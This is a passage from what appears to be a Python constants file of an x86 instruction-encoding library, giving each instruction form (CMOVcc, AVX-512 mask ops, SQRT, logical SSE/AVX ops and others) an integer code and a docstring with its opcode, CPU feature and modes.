``NP 0F 2F /r``
``SSE``
``16/32/64-bit``
"""
COMISD_XMM_XMMM64: int = 1156
"""
``COMISD xmm1, xmm2/m64``
``66 0F 2F /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VCOMISS_XMM_XMMM32: int = 1157
"""
``VCOMISS xmm1, xmm2/m32``
``VEX.LIG.0F.WIG 2F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCOMISD_XMM_XMMM64: int = 1158
"""
``VCOMISD xmm1, xmm2/m64``
``VEX.LIG.66.0F.WIG 2F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VCOMISS_XMM_XMMM32_SAE: int = 1159
"""
``VCOMISS xmm1, xmm2/m32{sae}``
``EVEX.LIG.0F.W0 2F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCOMISD_XMM_XMMM64_SAE: int = 1160
"""
``VCOMISD xmm1, xmm2/m64{sae}``
``EVEX.LIG.66.0F.W1 2F /r``
``AVX512F``
``16/32/64-bit``
"""
WRMSR: int = 1161
"""
``WRMSR``
``0F 30``
``MSR``
``16/32/64-bit``
"""
RDTSC: int = 1162
"""
``RDTSC``
``0F 31``
``TSC``
``16/32/64-bit``
"""
RDMSR: int = 1163
"""
``RDMSR``
``0F 32``
``MSR``
``16/32/64-bit``
"""
RDPMC: int = 1164
"""
``RDPMC``
``0F 33``
``Pentium MMX or later, or Pentium Pro or later``
``16/32/64-bit``
"""
SYSENTER: int = 1165
"""
``SYSENTER``
``0F 34``
``SEP``
``16/32/64-bit``
"""
SYSEXITD: int = 1166
"""
``SYSEXIT``
``0F 35``
``SEP``
``16/32/64-bit``
"""
SYSEXITQ: int = 1167
"""
``SYSEXITQ``
``o64 0F 35``
``SEP``
``64-bit``
"""
GETSECD: int = 1168
"""
``GETSEC``
``NP 0F 37``
``SMX``
``16/32/64-bit``
"""
CMOVO_R16_RM16: int = 1169
"""
``CMOVO r16, r/m16``
``o16 0F 40 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVO_R32_RM32: int = 1170
"""
``CMOVO r32, r/m32``
``o32 0F 40 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVO_R64_RM64: int = 1171
"""
``CMOVO r64, r/m64``
``o64 0F 40 /r``
``CMOV``
``64-bit``
"""
CMOVNO_R16_RM16: int = 1172
"""
``CMOVNO r16, r/m16``
``o16 0F 41 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNO_R32_RM32: int = 1173
"""
``CMOVNO r32, r/m32``
``o32 0F 41 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNO_R64_RM64: int = 1174
"""
``CMOVNO r64, r/m64``
``o64 0F 41 /r``
``CMOV``
``64-bit``
"""
CMOVB_R16_RM16: int = 1175
"""
``CMOVB r16, r/m16``
``o16 0F 42 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVB_R32_RM32: int = 1176
"""
``CMOVB r32, r/m32``
``o32 0F 42 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVB_R64_RM64: int = 1177
"""
``CMOVB r64, r/m64``
``o64 0F 42 /r``
``CMOV``
``64-bit``
"""
CMOVAE_R16_RM16: int = 1178
"""
``CMOVAE r16, r/m16``
``o16 0F 43 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVAE_R32_RM32: int = 1179
"""
``CMOVAE r32, r/m32``
``o32 0F 43 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVAE_R64_RM64: int = 1180
"""
``CMOVAE r64, r/m64``
``o64 0F 43 /r``
``CMOV``
``64-bit``
"""
CMOVE_R16_RM16: int = 1181
"""
``CMOVE r16, r/m16``
``o16 0F 44 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVE_R32_RM32: int = 1182
"""
``CMOVE r32, r/m32``
``o32 0F 44 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVE_R64_RM64: int = 1183
"""
``CMOVE r64, r/m64``
``o64 0F 44 /r``
``CMOV``
``64-bit``
"""
CMOVNE_R16_RM16: int = 1184
"""
``CMOVNE r16, r/m16``
``o16 0F 45 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNE_R32_RM32: int = 1185
"""
``CMOVNE r32, r/m32``
``o32 0F 45 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNE_R64_RM64: int = 1186
"""
``CMOVNE r64, r/m64``
``o64 0F 45 /r``
``CMOV``
``64-bit``
"""
CMOVBE_R16_RM16: int = 1187
"""
``CMOVBE r16, r/m16``
``o16 0F 46 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVBE_R32_RM32: int = 1188
"""
``CMOVBE r32, r/m32``
``o32 0F 46 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVBE_R64_RM64: int = 1189
"""
``CMOVBE r64, r/m64``
``o64 0F 46 /r``
``CMOV``
``64-bit``
"""
CMOVA_R16_RM16: int = 1190
"""
``CMOVA r16, r/m16``
``o16 0F 47 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVA_R32_RM32: int = 1191
"""
``CMOVA r32, r/m32``
``o32 0F 47 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVA_R64_RM64: int = 1192
"""
``CMOVA r64, r/m64``
``o64 0F 47 /r``
``CMOV``
``64-bit``
"""
CMOVS_R16_RM16: int = 1193
"""
``CMOVS r16, r/m16``
``o16 0F 48 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVS_R32_RM32: int = 1194
"""
``CMOVS r32, r/m32``
``o32 0F 48 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVS_R64_RM64: int = 1195
"""
``CMOVS r64, r/m64``
``o64 0F 48 /r``
``CMOV``
``64-bit``
"""
CMOVNS_R16_RM16: int = 1196
"""
``CMOVNS r16, r/m16``
``o16 0F 49 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNS_R32_RM32: int = 1197
"""
``CMOVNS r32, r/m32``
``o32 0F 49 /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNS_R64_RM64: int = 1198
"""
``CMOVNS r64, r/m64``
``o64 0F 49 /r``
``CMOV``
``64-bit``
"""
CMOVP_R16_RM16: int = 1199
"""
``CMOVP r16, r/m16``
``o16 0F 4A /r``
``CMOV``
``16/32/64-bit``
"""
CMOVP_R32_RM32: int = 1200
"""
``CMOVP r32, r/m32``
``o32 0F 4A /r``
``CMOV``
``16/32/64-bit``
"""
CMOVP_R64_RM64: int = 1201
"""
``CMOVP r64, r/m64``
``o64 0F 4A /r``
``CMOV``
``64-bit``
"""
CMOVNP_R16_RM16: int = 1202
"""
``CMOVNP r16, r/m16``
``o16 0F 4B /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNP_R32_RM32: int = 1203
"""
``CMOVNP r32, r/m32``
``o32 0F 4B /r``
``CMOV``
``16/32/64-bit``
"""
CMOVNP_R64_RM64: int = 1204
"""
``CMOVNP r64, r/m64``
``o64 0F 4B /r``
``CMOV``
``64-bit``
"""
CMOVL_R16_RM16: int = 1205
"""
``CMOVL r16, r/m16``
``o16 0F 4C /r``
``CMOV``
``16/32/64-bit``
"""
CMOVL_R32_RM32: int = 1206
"""
``CMOVL r32, r/m32``
``o32 0F 4C /r``
``CMOV``
``16/32/64-bit``
"""
CMOVL_R64_RM64: int = 1207
"""
``CMOVL r64, r/m64``
``o64 0F 4C /r``
``CMOV``
``64-bit``
"""
CMOVGE_R16_RM16: int = 1208
"""
``CMOVGE r16, r/m16``
``o16 0F 4D /r``
``CMOV``
``16/32/64-bit``
"""
CMOVGE_R32_RM32: int = 1209
"""
``CMOVGE r32, r/m32``
``o32 0F 4D /r``
``CMOV``
``16/32/64-bit``
"""
CMOVGE_R64_RM64: int = 1210
"""
``CMOVGE r64, r/m64``
``o64 0F 4D /r``
``CMOV``
``64-bit``
"""
CMOVLE_R16_RM16: int = 1211
"""
``CMOVLE r16, r/m16``
``o16 0F 4E /r``
``CMOV``
``16/32/64-bit``
"""
CMOVLE_R32_RM32: int = 1212
"""
``CMOVLE r32, r/m32``
``o32 0F 4E /r``
``CMOV``
``16/32/64-bit``
"""
CMOVLE_R64_RM64: int = 1213
"""
``CMOVLE r64, r/m64``
``o64 0F 4E /r``
``CMOV``
``64-bit``
"""
CMOVG_R16_RM16: int = 1214
"""
``CMOVG r16, r/m16``
``o16 0F 4F /r``
``CMOV``
``16/32/64-bit``
"""
CMOVG_R32_RM32: int = 1215
"""
``CMOVG r32, r/m32``
``o32 0F 4F /r``
``CMOV``
``16/32/64-bit``
"""
CMOVG_R64_RM64: int = 1216
"""
``CMOVG r64, r/m64``
``o64 0F 4F /r``
``CMOV``
``64-bit``
"""
VEX_KANDW_KR_KR_KR: int = 1217
"""
``KANDW k1, k2, k3``
``VEX.L1.0F.W0 41 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KANDQ_KR_KR_KR: int = 1218
"""
``KANDQ k1, k2, k3``
``VEX.L1.0F.W1 41 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KANDB_KR_KR_KR: int = 1219
"""
``KANDB k1, k2, k3``
``VEX.L1.66.0F.W0 41 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KANDD_KR_KR_KR: int = 1220
"""
``KANDD k1, k2, k3``
``VEX.L1.66.0F.W1 41 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KANDNW_KR_KR_KR: int = 1221
"""
``KANDNW k1, k2, k3``
``VEX.L1.0F.W0 42 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KANDNQ_KR_KR_KR: int = 1222
"""
``KANDNQ k1, k2, k3``
``VEX.L1.0F.W1 42 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KANDNB_KR_KR_KR: int = 1223
"""
``KANDNB k1, k2, k3``
``VEX.L1.66.0F.W0 42 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KANDND_KR_KR_KR: int = 1224
"""
``KANDND k1, k2, k3``
``VEX.L1.66.0F.W1 42 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KNOTW_KR_KR: int = 1225
"""
``KNOTW k1, k2``
``VEX.L0.0F.W0 44 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KNOTQ_KR_KR: int = 1226
"""
``KNOTQ k1, k2``
``VEX.L0.0F.W1 44 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KNOTB_KR_KR: int = 1227
"""
``KNOTB k1, k2``
``VEX.L0.66.0F.W0 44 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KNOTD_KR_KR: int = 1228
"""
``KNOTD k1, k2``
``VEX.L0.66.0F.W1 44 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KORW_KR_KR_KR: int = 1229
"""
``KORW k1, k2, k3``
``VEX.L1.0F.W0 45 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KORQ_KR_KR_KR: int = 1230
"""
``KORQ k1, k2, k3``
``VEX.L1.0F.W1 45 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KORB_KR_KR_KR: int = 1231
"""
``KORB k1, k2, k3``
``VEX.L1.66.0F.W0 45 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KORD_KR_KR_KR: int = 1232
"""
``KORD k1, k2, k3``
``VEX.L1.66.0F.W1 45 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KXNORW_KR_KR_KR: int = 1233
"""
``KXNORW k1, k2, k3``
``VEX.L1.0F.W0 46 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KXNORQ_KR_KR_KR: int = 1234
"""
``KXNORQ k1, k2, k3``
``VEX.L1.0F.W1 46 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KXNORB_KR_KR_KR: int = 1235
"""
``KXNORB k1, k2, k3``
``VEX.L1.66.0F.W0 46 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KXNORD_KR_KR_KR: int = 1236
"""
``KXNORD k1, k2, k3``
``VEX.L1.66.0F.W1 46 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KXORW_KR_KR_KR: int = 1237
"""
``KXORW k1, k2, k3``
``VEX.L1.0F.W0 47 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KXORQ_KR_KR_KR: int = 1238
"""
``KXORQ k1, k2, k3``
``VEX.L1.0F.W1 47 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KXORB_KR_KR_KR: int = 1239
"""
``KXORB k1, k2, k3``
``VEX.L1.66.0F.W0 47 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KXORD_KR_KR_KR: int = 1240
"""
``KXORD k1, k2, k3``
``VEX.L1.66.0F.W1 47 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KADDW_KR_KR_KR: int = 1241
"""
``KADDW k1, k2, k3``
``VEX.L1.0F.W0 4A /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KADDQ_KR_KR_KR: int = 1242
"""
``KADDQ k1, k2, k3``
``VEX.L1.0F.W1 4A /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KADDB_KR_KR_KR: int = 1243
"""
``KADDB k1, k2, k3``
``VEX.L1.66.0F.W0 4A /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KADDD_KR_KR_KR: int = 1244
"""
``KADDD k1, k2, k3``
``VEX.L1.66.0F.W1 4A /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KUNPCKWD_KR_KR_KR: int = 1245
"""
``KUNPCKWD k1, k2, k3``
``VEX.L1.0F.W0 4B /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KUNPCKDQ_KR_KR_KR: int = 1246
"""
``KUNPCKDQ k1, k2, k3``
``VEX.L1.0F.W1 4B /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KUNPCKBW_KR_KR_KR: int = 1247
"""
``KUNPCKBW k1, k2, k3``
``VEX.L1.66.0F.W0 4B /r``
``AVX512F``
``16/32/64-bit``
"""
MOVMSKPS_R32_XMM: int = 1248
"""
``MOVMSKPS r32, xmm``
``NP 0F 50 /r``
``SSE``
``16/32/64-bit``
"""
MOVMSKPS_R64_XMM: int = 1249
"""
``MOVMSKPS r64, xmm``
``NP o64 0F 50 /r``
``SSE``
``64-bit``
"""
VEX_VMOVMSKPS_R32_XMM: int = 1250
"""
``VMOVMSKPS r32, xmm2``
``VEX.128.0F.W0 50 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVMSKPS_R64_XMM: int = 1251
"""
``VMOVMSKPS r64, xmm2``
``VEX.128.0F.W1 50 /r``
``AVX``
``64-bit``
"""
VEX_VMOVMSKPS_R32_YMM: int = 1252
"""
``VMOVMSKPS r32, ymm2``
``VEX.256.0F.W0 50 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVMSKPS_R64_YMM: int = 1253
"""
``VMOVMSKPS r64, ymm2``
``VEX.256.0F.W1 50 /r``
``AVX``
``64-bit``
"""
MOVMSKPD_R32_XMM: int = 1254
"""
``MOVMSKPD r32, xmm``
``66 0F 50 /r``
``SSE2``
``16/32/64-bit``
"""
MOVMSKPD_R64_XMM: int = 1255
"""
``MOVMSKPD r64, xmm``
``66 o64 0F 50 /r``
``SSE2``
``64-bit``
"""
VEX_VMOVMSKPD_R32_XMM: int = 1256
"""
``VMOVMSKPD r32, xmm2``
``VEX.128.66.0F.W0 50 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVMSKPD_R64_XMM: int = 1257
"""
``VMOVMSKPD r64, xmm2``
``VEX.128.66.0F.W1 50 /r``
``AVX``
``64-bit``
"""
VEX_VMOVMSKPD_R32_YMM: int = 1258
"""
``VMOVMSKPD r32, ymm2``
``VEX.256.66.0F.W0 50 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVMSKPD_R64_YMM: int = 1259
"""
``VMOVMSKPD r64, ymm2``
``VEX.256.66.0F.W1 50 /r``
``AVX``
``64-bit``
"""
SQRTPS_XMM_XMMM128: int = 1260
"""
``SQRTPS xmm1, xmm2/m128``
``NP 0F 51 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VSQRTPS_XMM_XMMM128: int = 1261
"""
``VSQRTPS xmm1, xmm2/m128``
``VEX.128.0F.WIG 51 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VSQRTPS_YMM_YMMM256: int = 1262
"""
``VSQRTPS ymm1, ymm2/m256``
``VEX.256.0F.WIG 51 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSQRTPS_XMM_K1Z_XMMM128B32: int = 1263
"""
``VSQRTPS xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.0F.W0 51 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSQRTPS_YMM_K1Z_YMMM256B32: int = 1264
"""
``VSQRTPS ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.0F.W0 51 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSQRTPS_ZMM_K1Z_ZMMM512B32_ER: int = 1265
"""
``VSQRTPS zmm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.0F.W0 51 /r``
``AVX512F``
``16/32/64-bit``
"""
SQRTPD_XMM_XMMM128: int = 1266
"""
``SQRTPD xmm1, xmm2/m128``
``66 0F 51 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VSQRTPD_XMM_XMMM128: int = 1267
"""
``VSQRTPD xmm1, xmm2/m128``
``VEX.128.66.0F.WIG 51 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VSQRTPD_YMM_YMMM256: int = 1268
"""
``VSQRTPD ymm1, ymm2/m256``
``VEX.256.66.0F.WIG 51 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSQRTPD_XMM_K1Z_XMMM128B64: int = 1269
"""
``VSQRTPD xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F.W1 51 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSQRTPD_YMM_K1Z_YMMM256B64: int = 1270
"""
``VSQRTPD ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F.W1 51 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSQRTPD_ZMM_K1Z_ZMMM512B64_ER: int = 1271
"""
``VSQRTPD zmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.66.0F.W1 51 /r``
``AVX512F``
``16/32/64-bit``
"""
SQRTSS_XMM_XMMM32: int = 1272
"""
``SQRTSS xmm1, xmm2/m32``
``F3 0F 51 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VSQRTSS_XMM_XMM_XMMM32: int = 1273
"""
``VSQRTSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 51 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSQRTSS_XMM_K1Z_XMM_XMMM32_ER: int = 1274
"""
``VSQRTSS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F3.0F.W0 51 /r``
``AVX512F``
``16/32/64-bit``
"""
SQRTSD_XMM_XMMM64: int = 1275
"""
``SQRTSD xmm1, xmm2/m64``
``F2 0F 51 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VSQRTSD_XMM_XMM_XMMM64: int = 1276
"""
``VSQRTSD xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 51 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSQRTSD_XMM_K1Z_XMM_XMMM64_ER: int = 1277
"""
``VSQRTSD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.F2.0F.W1 51 /r``
``AVX512F``
``16/32/64-bit``
"""
RSQRTPS_XMM_XMMM128: int = 1278
"""
``RSQRTPS xmm1, xmm2/m128``
``NP 0F 52 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VRSQRTPS_XMM_XMMM128: int = 1279
"""
``VRSQRTPS xmm1, xmm2/m128``
``VEX.128.0F.WIG 52 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VRSQRTPS_YMM_YMMM256: int = 1280
"""
``VRSQRTPS ymm1, ymm2/m256``
``VEX.256.0F.WIG 52 /r``
``AVX``
``16/32/64-bit``
"""
RSQRTSS_XMM_XMMM32: int = 1281
"""
``RSQRTSS xmm1, xmm2/m32``
``F3 0F 52 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VRSQRTSS_XMM_XMM_XMMM32: int = 1282
"""
``VRSQRTSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 52 /r``
``AVX``
``16/32/64-bit``
"""
RCPPS_XMM_XMMM128: int = 1283
"""
``RCPPS xmm1, xmm2/m128``
``NP 0F 53 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VRCPPS_XMM_XMMM128: int = 1284
"""
``VRCPPS xmm1, xmm2/m128``
``VEX.128.0F.WIG 53 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VRCPPS_YMM_YMMM256: int = 1285
"""
``VRCPPS ymm1, ymm2/m256``
``VEX.256.0F.WIG 53 /r``
``AVX``
``16/32/64-bit``
"""
RCPSS_XMM_XMMM32: int = 1286
"""
``RCPSS xmm1, xmm2/m32``
``F3 0F 53 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VRCPSS_XMM_XMM_XMMM32: int = 1287
"""
``VRCPSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 53 /r``
``AVX``
``16/32/64-bit``
"""
ANDPS_XMM_XMMM128: int = 1288
"""
``ANDPS xmm1, xmm2/m128``
``NP 0F 54 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VANDPS_XMM_XMM_XMMM128: int = 1289
"""
``VANDPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 54 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VANDPS_YMM_YMM_YMMM256: int = 1290
"""
``VANDPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 54 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VANDPS_XMM_K1Z_XMM_XMMM128B32: int = 1291
"""
``VANDPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 54 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDPS_YMM_K1Z_YMM_YMMM256B32: int = 1292
"""
``VANDPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 54 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1293
"""
``VANDPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.0F.W0 54 /r``
``AVX512DQ``
``16/32/64-bit``
"""
ANDPD_XMM_XMMM128: int = 1294
"""
``ANDPD xmm1, xmm2/m128``
``66 0F 54 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VANDPD_XMM_XMM_XMMM128: int = 1295
"""
``VANDPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 54 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VANDPD_YMM_YMM_YMMM256: int = 1296
"""
``VANDPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 54 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VANDPD_XMM_K1Z_XMM_XMMM128B64: int = 1297
"""
``VANDPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 54 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDPD_YMM_K1Z_YMM_YMMM256B64: int = 1298
"""
``VANDPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 54 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1299
"""
``VANDPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 54 /r``
``AVX512DQ``
``16/32/64-bit``
"""
ANDNPS_XMM_XMMM128: int = 1300
"""
``ANDNPS xmm1, xmm2/m128``
``NP 0F 55 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VANDNPS_XMM_XMM_XMMM128: int = 1301
"""
``VANDNPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 55 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VANDNPS_YMM_YMM_YMMM256: int = 1302
"""
``VANDNPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 55 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VANDNPS_XMM_K1Z_XMM_XMMM128B32: int = 1303
"""
``VANDNPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 55 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDNPS_YMM_K1Z_YMM_YMMM256B32: int = 1304
"""
``VANDNPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 55 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDNPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1305
"""
``VANDNPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.0F.W0 55 /r``
``AVX512DQ``
``16/32/64-bit``
"""
ANDNPD_XMM_XMMM128: int = 1306
"""
``ANDNPD xmm1, xmm2/m128``
``66 0F 55 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VANDNPD_XMM_XMM_XMMM128: int = 1307
"""
``VANDNPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 55 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VANDNPD_YMM_YMM_YMMM256: int = 1308
"""
``VANDNPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 55 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VANDNPD_XMM_K1Z_XMM_XMMM128B64: int = 1309
"""
``VANDNPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 55 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDNPD_YMM_K1Z_YMM_YMMM256B64: int = 1310
"""
``VANDNPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 55 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VANDNPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1311
"""
``VANDNPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 55 /r``
``AVX512DQ``
``16/32/64-bit``
"""
ORPS_XMM_XMMM128: int = 1312
"""
``ORPS xmm1, xmm2/m128``
``NP 0F 56 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VORPS_XMM_XMM_XMMM128: int = 1313
"""
``VORPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 56 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VORPS_YMM_YMM_YMMM256: int = 1314
"""
``VORPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 56 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VORPS_XMM_K1Z_XMM_XMMM128B32: int = 1315
"""
``VORPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 56 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VORPS_YMM_K1Z_YMM_YMMM256B32: int = 1316
"""
``VORPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 56 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VORPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1317
"""
``VORPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.0F.W0 56 /r``
``AVX512DQ``
``16/32/64-bit``
"""
ORPD_XMM_XMMM128: int = 1318
"""
``ORPD xmm1, xmm2/m128``
``66 0F 56 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VORPD_XMM_XMM_XMMM128: int = 1319
"""
``VORPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 56 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VORPD_YMM_YMM_YMMM256: int = 1320
"""
``VORPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 56 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VORPD_XMM_K1Z_XMM_XMMM128B64: int = 1321
"""
``VORPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 56 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VORPD_YMM_K1Z_YMM_YMMM256B64: int = 1322
"""
``VORPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 56 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VORPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1323
"""
``VORPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 56 /r``
``AVX512DQ``
``16/32/64-bit``
"""
XORPS_XMM_XMMM128: int = 1324
"""
``XORPS xmm1, xmm2/m128``
``NP 0F 57 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VXORPS_XMM_XMM_XMMM128: int = 1325
"""
``VXORPS xmm1, xmm2, xmm3/m128``
